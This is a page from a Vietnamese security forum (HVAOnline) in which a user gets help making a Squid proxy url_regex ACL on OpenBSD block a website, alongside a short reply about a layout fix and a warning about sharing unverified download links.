Khi nhấn để xem những bài được gửi bởi user này, trang trình bày các kết quả hiện ra rất xấu, không đúng theo cái cột bên trên. 


Ui da... xấu thiệt smilie. Đã fix. Xem thử thế nào?

dongu wrote:
Em đang dùng OBSD3.7, squid được install thông qua package được build sẵn cho OBSD3.7 này:

Code:
# /usr/local/sbin/squid -v
Squid Cache: Version 2.5.STABLE12
configure options: --datadir=/usr/local/share/squid '--enable-auth=basic digest' '--enable-basic-auth-helpers=NCSA YP' --enable-digest-auth-helpers=password '--enable-external-acl-helpers=ip_user unix_group' '--enable-removal-policies=lru heap' --enable-ssl '--enable-storeio=ufs diskd' --localstatedir=/var/squid --prefix=/usr/local --sysconfdir=/etc
#


Có vấn đề với version squid em đang dùng hả anh?
 


Hèm.... version ok. Config flags ok. Có khi nào thứ tự ACL có gì không đúng không?

Hiện tại em filter các thứ khác bằng regex có work không?

dongu wrote:
Vẫn kết quả tương tự, dù có hay không "www".
Thử với "https" luôn nhưng vẫn truy cập vào bình thường smilie 


nếu vậy thì có vấn đề trên squid rồi. Em dùng squid phiên bảo nào? trên hệ điều hành nào? em tự compile hay dùng binary có sẵn?

Em post cái squid.conf của em lên xem thử?

intrepid wrote:
Vì link share nên tôi hoàn toàn ko biết dính virut hay keylog, xin lỗi anh em, tôi đã xoá link share của mình. 


Lần tới share link nên cẩn thận. Nếu chưa kiểm tra kỹ lưỡng mình cung cấp thì ghi xuống rõ ràng và cụ thể là mình không bảo đảm link này thế nào.

dongu wrote:
Em có một thắc mắc, nếu mình dùng rule như vậy thì khi user truy cập vào trang bị filer họ sẽ bị wwwect ngay đến một trang web khác, tức là trang chủ meebo vẫn không thể hiện ra chính xác được phải không anh?

Ví dụ bây giờ em filter 1 trang web khác: redhat.com chẳng hạn. rule cuả em set như thế này.

Code:
acl url_bweb url_regex "/etc/squid/bweb"
http_access deny url_bweb


Và nội dung của file bweb trong thư mục squid là:
Code:
# cat /etc/squid/bweb
^(http|https)://[a-z0-9]{1,}\.redhat\.com
#


Refresh lại squid daemon.
Thử truy cập vào http://redhat.com, thì trang web vẫn được load bình thường smilie, chưa có tác dụng. 


Em thử gõ http://www.redhat.com thay vì http://redhat.com xem? smilie
 
Go to Page:  First Page Page 300 301 302 303 305 306 307 Page 308 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|